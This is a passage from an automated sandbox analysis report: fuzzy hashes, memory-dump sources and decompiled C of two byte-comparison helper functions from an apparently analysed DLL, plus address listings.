                                                • Opcode ID: ae06f62e623463a2f3f0767ba0ac92bbd3f43da31655b5ffc641c2b340686a76
                                                • Instruction ID: 00a76544c8ef7dd371508f1f3a73c04aef6c909bfb402617bb54817c82ee37a4
                                                • Opcode Fuzzy Hash: ae06f62e623463a2f3f0767ba0ac92bbd3f43da31655b5ffc641c2b340686a76
                                                • Instruction Fuzzy Hash: DBF1131485D2EDADCB06CBF945547FCBFB05D2A102F0841CAE4E4A6243C53A938EDB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E10006B27(void* __edx, void* __esi) {
                                                				signed int _t197;
                                                				signed char _t198;
                                                				signed char _t199;
                                                				signed char _t200;
                                                				signed char _t202;
                                                				signed char _t203;
                                                				signed int _t246;
                                                				void* _t294;
                                                				void* _t297;
                                                				void* _t299;
                                                				void* _t301;
                                                				void* _t303;
                                                				void* _t305;
                                                				void* _t307;
                                                				void* _t309;
                                                				void* _t311;
                                                				void* _t313;
                                                				void* _t315;
                                                				void* _t317;
                                                				void* _t319;
                                                				void* _t321;
                                                				void* _t323;
                                                				void* _t325;
                                                				void* _t327;
                                                				void* _t329;
                                                				void* _t331;
                                                				void* _t333;
                                                				void* _t335;
                                                				void* _t336;
                                                
                                                				_t336 = __esi;
                                                				_t294 = __edx;
                                                				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
                                                					_t246 = 0;
                                                					L14:
                                                					if(_t246 != 0) {
                                                						goto L1;
                                                					}
                                                					_t198 =  *(_t336 - 0x1b);
                                                					if(_t198 ==  *(_t294 - 0x1b)) {
                                                						_t246 = 0;
                                                						L25:
                                                						if(_t246 != 0) {
                                                							goto L1;
                                                						}
                                                						_t199 =  *(_t336 - 0x17);
                                                						if(_t199 ==  *(_t294 - 0x17)) {
                                                							_t246 = 0;
                                                							L36:
                                                							if(_t246 != 0) {
                                                								goto L1;
                                                							}
                                                							_t200 =  *(_t336 - 0x13);
                                                							if(_t200 ==  *(_t294 - 0x13)) {
                                                								_t246 = 0;
                                                								L47:
                                                								if(_t246 != 0) {
                                                									goto L1;
                                                								}
                                                								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
                                                									_t246 = 0;
                                                									L58:
                                                									if(_t246 != 0) {
                                                										goto L1;
                                                									}
                                                									_t202 =  *(_t336 - 0xb);
                                                									if(_t202 ==  *(_t294 - 0xb)) {
                                                										_t246 = 0;
                                                										L69:
                                                										if(_t246 != 0) {
                                                											goto L1;
                                                										}
                                                										_t203 =  *(_t336 - 7);
                                                										if(_t203 ==  *(_t294 - 7)) {
                                                											_t246 = 0;
                                                											L80:
                                                											if(_t246 != 0) {
                                                												goto L1;
                                                											}
                                                											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
                                                											if(_t297 == 0) {
                                                												L83:
                                                												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
                                                												if(_t299 == 0) {
                                                													L3:
                                                													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
                                                													if(_t246 != 0) {
                                                														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                													}
                                                													goto L1;
                                                												}
                                                												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
                                                												if(_t246 != 0) {
                                                													goto L1;
                                                												} else {
                                                													goto L3;
                                                												}
                                                											}
                                                											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
                                                											if(_t246 != 0) {
                                                												goto L1;
                                                											}
                                                											goto L83;
                                                										}
                                                										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
                                                										if(_t301 == 0) {
                                                											L73:
                                                											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
                                                											if(_t303 == 0) {
                                                												L75:
                                                												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
                                                												if(_t305 == 0) {
                                                													L77:
                                                													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
                                                													if(_t246 != 0) {
                                                														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                													}
                                                													goto L80;
                                                												}
                                                												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
                                                												if(_t246 != 0) {
                                                													goto L1;
                                                												}
                                                												goto L77;
                                                											}
                                                											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
                                                											if(_t246 != 0) {
                                                												goto L1;
                                                											}
                                                											goto L75;
                                                										}
                                                										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
                                                										if(_t246 != 0) {
                                                											goto L1;
                                                										}
                                                										goto L73;
                                                									}
                                                									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
                                                									if(_t307 == 0) {
                                                										L62:
                                                										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
                                                										if(_t309 == 0) {
                                                											L64:
                                                											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
                                                											if(_t311 == 0) {
                                                												L66:
                                                												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
                                                												if(_t246 != 0) {
                                                													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                												}
                                                												goto L69;
                                                											}
                                                											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
                                                											if(_t246 != 0) {
                                                												goto L1;
                                                											}
                                                											goto L66;
                                                										}
                                                										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
                                                										if(_t246 != 0) {
                                                											goto L1;
                                                										}
                                                										goto L64;
                                                									}
                                                									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
                                                									if(_t246 != 0) {
                                                										goto L1;
                                                									}
                                                									goto L62;
                                                								}
                                                								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
                                                								if(_t313 == 0) {
                                                									L51:
                                                									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
                                                									if(_t315 == 0) {
                                                										L53:
                                                										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
                                                										if(_t317 == 0) {
                                                											L55:
                                                											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
                                                											if(_t246 != 0) {
                                                												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                											}
                                                											goto L58;
                                                										}
                                                										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
                                                										if(_t246 != 0) {
                                                											goto L1;
                                                										}
                                                										goto L55;
                                                									}
                                                									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
                                                									if(_t246 != 0) {
                                                										goto L1;
                                                									}
                                                									goto L53;
                                                								}
                                                								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
                                                								if(_t246 != 0) {
                                                									goto L1;
                                                								}
                                                								goto L51;
                                                							}
                                                							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
                                                							if(_t319 == 0) {
                                                								L40:
                                                								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
                                                								if(_t321 == 0) {
                                                									L42:
                                                									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
                                                									if(_t323 == 0) {
                                                										L44:
                                                										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
                                                										if(_t246 != 0) {
                                                											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                										}
                                                										goto L47;
                                                									}
                                                									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
                                                									if(_t246 != 0) {
                                                										goto L1;
                                                									}
                                                									goto L44;
                                                								}
                                                								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
                                                								if(_t246 != 0) {
                                                									goto L1;
                                                								}
                                                								goto L42;
                                                							}
                                                							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
                                                							if(_t246 != 0) {
                                                								goto L1;
                                                							}
                                                							goto L40;
                                                						}
                                                						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
                                                						if(_t325 == 0) {
                                                							L29:
                                                							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
                                                							if(_t327 == 0) {
                                                								L31:
                                                								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
                                                								if(_t329 == 0) {
                                                									L33:
                                                									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
                                                									if(_t246 != 0) {
                                                										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                									}
                                                									goto L36;
                                                								}
                                                								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
                                                								if(_t246 != 0) {
                                                									goto L1;
                                                								}
                                                								goto L33;
                                                							}
                                                							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
                                                							if(_t246 != 0) {
                                                								goto L1;
                                                							}
                                                							goto L31;
                                                						}
                                                						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
                                                						if(_t246 != 0) {
                                                							goto L1;
                                                						}
                                                						goto L29;
                                                					}
                                                					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
                                                					if(_t331 == 0) {
                                                						L18:
                                                						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
                                                						if(_t333 == 0) {
                                                							L20:
                                                							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
                                                							if(_t335 == 0) {
                                                								L22:
                                                								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
                                                								if(_t246 != 0) {
                                                									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
                                                								}
                                                								goto L25;
                                                							}
                                                							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
                                                							if(_t246 != 0) {
                                                								goto L1;
                                                							}
                                                							goto L22;
                                                						}
                                                						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
                                                						if(_t246 != 0) {
                                                							goto L1;
                                                						}
                                                						goto L20;
                                                					}
                                                					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
                                                					if(_t246 != 0) {
                                                						goto L1;
                                                					}
                                                					goto L18;
                                                				} else {
                                                					__edi =  *(__esi - 0x1f) & 0x000000ff;
                                                					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
                                                					if(__edi == 0) {
                                                						L7:
                                                						__edi =  *(__esi - 0x1e) & 0x000000ff;
                                                						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
                                                						if(__edi == 0) {
                                                							L9:
                                                							__edi =  *(__esi - 0x1d) & 0x000000ff;
                                                							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                							if(__edi == 0) {
                                                								L11:
                                                								__ecx =  *(__esi - 0x1c) & 0x000000ff;
                                                								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                								if(__ecx != 0) {
                                                									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                								}
                                                								goto L14;
                                                							}
                                                							0 = 0 | __edi > 0x00000000;
                                                							__ecx = (__edi > 0) * 2 != 1;
                                                							if((__edi > 0) * 2 != 1) {
                                                								goto L1;
                                                							}
                                                							goto L11;
                                                						}
                                                						0 = 0 | __edi > 0x00000000;
                                                						__ecx = (__edi > 0) * 2 != 1;
                                                						if((__edi > 0) * 2 != 1) {
                                                							goto L1;
                                                						}
                                                						goto L9;
                                                					}
                                                					0 = 0 | __edi > 0x00000000;
                                                					__ecx = (__edi > 0) * 2 != 1;
                                                					if((__edi > 0) * 2 != 1) {
                                                						goto L1;
                                                					}
                                                					goto L7;
                                                				}
                                                				L1:
                                                				_t197 = _t246;
                                                				return _t197;
                                                			}
































                                                0x10006efc
                                                0x10006ed1
                                                0x10006eda
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006eda
                                                0x10006e2f
                                                0x10006e31
                                                0x10006e49
                                                0x10006e51
                                                0x10006e53
                                                0x10006e6b
                                                0x10006e73
                                                0x10006e75
                                                0x10006e8d
                                                0x10006e95
                                                0x10006e97
                                                0x10006ea0
                                                0x10006ea0
                                                0x00000000
                                                0x10006e97
                                                0x10006e7e
                                                0x10006e87
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006e87
                                                0x10006e5c
                                                0x10006e65
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006e65
                                                0x10006e3a
                                                0x10006e43
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006e43
                                                0x10006d98
                                                0x10006d9a
                                                0x10006db2
                                                0x10006dba
                                                0x10006dbc
                                                0x10006dd4
                                                0x10006ddc
                                                0x10006dde
                                                0x10006df6
                                                0x10006dfe
                                                0x10006e00
                                                0x10006e09
                                                0x10006e09
                                                0x00000000
                                                0x10006e00
                                                0x10006de7
                                                0x10006df0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006df0
                                                0x10006dc5
                                                0x10006dce
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006dce
                                                0x10006da3
                                                0x10006dac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006dac
                                                0x10006d00
                                                0x10006d02
                                                0x10006d1a
                                                0x10006d22
                                                0x10006d24
                                                0x10006d3c
                                                0x10006d44
                                                0x10006d46
                                                0x10006d5e
                                                0x10006d66
                                                0x10006d68
                                                0x10006d71
                                                0x10006d71
                                                0x00000000
                                                0x10006d68
                                                0x10006d4f
                                                0x10006d58
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006d58
                                                0x10006d2d
                                                0x10006d36
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006d36
                                                0x10006d0b
                                                0x10006d14
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006d14
                                                0x10006c69
                                                0x10006c6b
                                                0x10006c83
                                                0x10006c8b
                                                0x10006c8d
                                                0x10006ca5
                                                0x10006cad
                                                0x10006caf
                                                0x10006cc7
                                                0x10006ccf
                                                0x10006cd1
                                                0x10006cda
                                                0x10006cda
                                                0x00000000
                                                0x10006cd1
                                                0x10006cb8
                                                0x10006cc1
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006cc1
                                                0x10006c96
                                                0x10006c9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006c9f
                                                0x10006c74
                                                0x10006c7d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006c7d
                                                0x10006bd2
                                                0x10006bd4
                                                0x10006bec
                                                0x10006bf4
                                                0x10006bf6
                                                0x10006c0e
                                                0x10006c16
                                                0x10006c18
                                                0x10006c30
                                                0x10006c38
                                                0x10006c3a
                                                0x10006c43
                                                0x10006c43
                                                0x00000000
                                                0x10006c3a
                                                0x10006c21
                                                0x10006c2a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006c2a
                                                0x10006bff
                                                0x10006c08
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006c08
                                                0x10006bdd
                                                0x10006be6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006b33
                                                0x10006b37
                                                0x10006b3b
                                                0x10006b3d
                                                0x10006b55
                                                0x10006b55
                                                0x10006b5d
                                                0x10006b5f
                                                0x10006b77
                                                0x10006b77
                                                0x10006b7f
                                                0x10006b81
                                                0x10006b99
                                                0x10006b99
                                                0x10006ba1
                                                0x10006ba3
                                                0x10006bac
                                                0x10006bac
                                                0x00000000
                                                0x10006ba3
                                                0x10006b87
                                                0x10006b8a
                                                0x10006b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006b93
                                                0x10006b65
                                                0x10006b68
                                                0x10006b71
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006b71
                                                0x10006b43
                                                0x10006b46
                                                0x10006b4f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x10006b4f
                                                0x100062b5
                                                0x100062b5
                                                0x100070a6

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction ID: dba2690435f19ab94b9c718f143c1f7ded23596ac492d5ba3488478ce37288e5
                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                • Instruction Fuzzy Hash: EAC15F3220559309FB5D8A79C83413EBBE2EB966F1327176DD4B2DF1D8EF20C5649A20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a8bc158d68c2eb6a482b99ac5ca4ea34feabbbffff224285eb39901da0172e52
                                                • Instruction ID: 75bf2b8c409c402bf89ce584128011f6ee5bfd5b445aeddf79bdfb4475587805
                                                • Opcode Fuzzy Hash: a8bc158d68c2eb6a482b99ac5ca4ea34feabbbffff224285eb39901da0172e52
                                                • Instruction Fuzzy Hash: 43F1F21485D2EDADCB06CBF945647FCBFB05D2A102F0841CAE4E5E6283C53A938EDB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E100062BD(void* __edx, void* __esi) {
                                                				signed int _t184;
                                                				signed char _t185;
                                                				signed char _t186;
                                                				signed char _t187;
                                                				signed char _t188;
                                                				signed char _t190;
                                                				signed int _t231;
                                                				void* _t275;
                                                				void* _t278;
                                                				void* _t280;
                                                				void* _t282;
                                                				void* _t284;
                                                				void* _t286;
                                                				void* _t288;
                                                				void* _t290;
                                                				void* _t292;
                                                				void* _t294;
                                                				void* _t296;
                                                				void* _t298;
                                                				void* _t300;
                                                				void* _t302;
                                                				void* _t304;
                                                				void* _t306;
                                                				void* _t308;
                                                				void* _t310;
                                                				void* _t312;
                                                				void* _t313;
                                                
                                                				_t313 = __esi;
                                                				_t275 = __edx;
                                                				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
                                                					_t231 = 0;
                                                					L11:
                                                					if(_t231 != 0) {
                                                						goto L1;
                                                					}
                                                					_t185 =  *(_t313 - 0x19);
                                                					if(_t185 ==  *(_t275 - 0x19)) {
                                                						_t231 = 0;
                                                						L22:
                                                						if(_t231 != 0) {
                                                							goto L1;
                                                						}
                                                						_t186 =  *(_t313 - 0x15);
                                                						if(_t186 ==  *(_t275 - 0x15)) {
                                                							_t231 = 0;
                                                							L33:
                                                							if(_t231 != 0) {
                                                								goto L1;
                                                							}
                                                							_t187 =  *(_t313 - 0x11);
                                                							if(_t187 ==  *(_t275 - 0x11)) {
                                                								_t231 = 0;
                                                								L44:
                                                								if(_t231 != 0) {
                                                									goto L1;
                                                								}
                                                								_t188 =  *(_t313 - 0xd);
                                                								if(_t188 ==  *(_t275 - 0xd)) {
                                                									_t231 = 0;
                                                									L55:
                                                									if(_t231 != 0) {
                                                										goto L1;
                                                									}
                                                									if( *(_t313 - 9) ==  *(_t275 - 9)) {
                                                										_t231 = 0;
                                                										L66:
                                                										if(_t231 != 0) {
                                                											goto L1;
                                                										}
                                                										_t190 =  *(_t313 - 5);
                                                										if(_t190 ==  *(_t275 - 5)) {
                                                											_t231 = 0;
                                                											L77:
                                                											if(_t231 == 0) {
                                                												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
                                                												if(_t231 != 0) {
                                                													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                												}
                                                											}
                                                											goto L1;
                                                										}
                                                										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
                                                										if(_t278 == 0) {
                                                											L70:
                                                											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
                                                											if(_t280 == 0) {
                                                												L72:
                                                												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
                                                												if(_t282 == 0) {
                                                													L74:
                                                													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
                                                													if(_t231 != 0) {
                                                														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                													}
                                                													goto L77;
                                                												}
                                                												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
                                                												if(_t231 != 0) {
                                                													goto L1;
                                                												}
                                                												goto L74;
                                                											}
                                                											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
                                                											if(_t231 != 0) {
                                                												goto L1;
                                                											}
                                                											goto L72;
                                                										}
                                                										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
                                                										if(_t231 != 0) {
                                                											goto L1;
                                                										}
                                                										goto L70;
                                                									}
                                                									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
                                                									if(_t284 == 0) {
                                                										L59:
                                                										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
                                                										if(_t286 == 0) {
                                                											L61:
                                                											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
                                                											if(_t288 == 0) {
                                                												L63:
                                                												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
                                                												if(_t231 != 0) {
                                                													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                												}
                                                												goto L66;
                                                											}
                                                											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
                                                											if(_t231 != 0) {
                                                												goto L1;
                                                											}
                                                											goto L63;
                                                										}
                                                										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
                                                										if(_t231 != 0) {
                                                											goto L1;
                                                										}
                                                										goto L61;
                                                									}
                                                									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
                                                									if(_t231 != 0) {
                                                										goto L1;
                                                									}
                                                									goto L59;
                                                								}
                                                								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
                                                								if(_t290 == 0) {
                                                									L48:
                                                									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
                                                									if(_t292 == 0) {
                                                										L50:
                                                										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
                                                										if(_t294 == 0) {
                                                											L52:
                                                											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
                                                											if(_t231 != 0) {
                                                												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                											}
                                                											goto L55;
                                                										}
                                                										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
                                                										if(_t231 != 0) {
                                                											goto L1;
                                                										}
                                                										goto L52;
                                                									}
                                                									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
                                                									if(_t231 != 0) {
                                                										goto L1;
                                                									}
                                                									goto L50;
                                                								}
                                                								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
                                                								if(_t231 != 0) {
                                                									goto L1;
                                                								}
                                                								goto L48;
                                                							}
                                                							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
                                                							if(_t296 == 0) {
                                                								L37:
                                                								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
                                                								if(_t298 == 0) {
                                                									L39:
                                                									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
                                                									if(_t300 == 0) {
                                                										L41:
                                                										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
                                                										if(_t231 != 0) {
                                                											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                										}
                                                										goto L44;
                                                									}
                                                									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
                                                									if(_t231 != 0) {
                                                										goto L1;
                                                									}
                                                									goto L41;
                                                								}
                                                								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
                                                								if(_t231 != 0) {
                                                									goto L1;
                                                								}
                                                								goto L39;
                                                							}
                                                							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
                                                							if(_t231 != 0) {
                                                								goto L1;
                                                							}
                                                							goto L37;
                                                						}
                                                						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
                                                						if(_t302 == 0) {
                                                							L26:
                                                							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
                                                							if(_t304 == 0) {
                                                								L28:
                                                								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
                                                								if(_t306 == 0) {
                                                									L30:
                                                									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
                                                									if(_t231 != 0) {
                                                										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                									}
                                                									goto L33;
                                                								}
                                                								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
                                                								if(_t231 != 0) {
                                                									goto L1;
                                                								}
                                                								goto L30;
                                                							}
                                                							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
                                                							if(_t231 != 0) {
                                                								goto L1;
                                                							}
                                                							goto L28;
                                                						}
                                                						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
                                                						if(_t231 != 0) {
                                                							goto L1;
                                                						}
                                                						goto L26;
                                                					}
                                                					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
                                                					if(_t308 == 0) {
                                                						L15:
                                                						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
                                                						if(_t310 == 0) {
                                                							L17:
                                                							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
                                                							if(_t312 == 0) {
                                                								L19:
                                                								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
                                                								if(_t231 != 0) {
                                                									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
                                                								}
                                                								goto L22;
                                                							}
                                                							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
                                                							if(_t231 != 0) {
                                                								goto L1;
                                                							}
                                                							goto L19;
                                                						}
                                                						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
                                                						if(_t231 != 0) {
                                                							goto L1;
                                                						}
                                                						goto L17;
                                                					}
                                                					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
                                                					if(_t231 != 0) {
                                                						goto L1;
                                                					}
                                                					goto L15;
                                                				} else {
                                                					__edi = __al & 0x000000ff;
                                                					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
                                                					if(__edi == 0) {
                                                						L4:
                                                						__edi =  *(__esi - 0x1c) & 0x000000ff;
                                                						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                                                						if(__edi == 0) {
                                                							L6:
                                                							__edi =  *(__esi - 0x1b) & 0x000000ff;
                                                							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
                                                							if(__edi == 0) {
                                                								L8:
                                                								__ecx =  *(__esi - 0x1a) & 0x000000ff;
                                                								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
                                                								if(__ecx != 0) {
                                                									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
                                                								}
                                                								goto L11;
                                                							}
                                                							0 = 0 | __edi > 0x00000000;
                                                							__ecx = (__edi > 0) * 2 != 1;
                                                							if((__edi > 0) * 2 != 1) {
                                                								goto L1;
                                                							}
                                                							goto L8;
                                                						}
                                                						0 = 0 | __edi > 0x00000000;
                                                						__ecx = (__edi > 0) * 2 != 1;
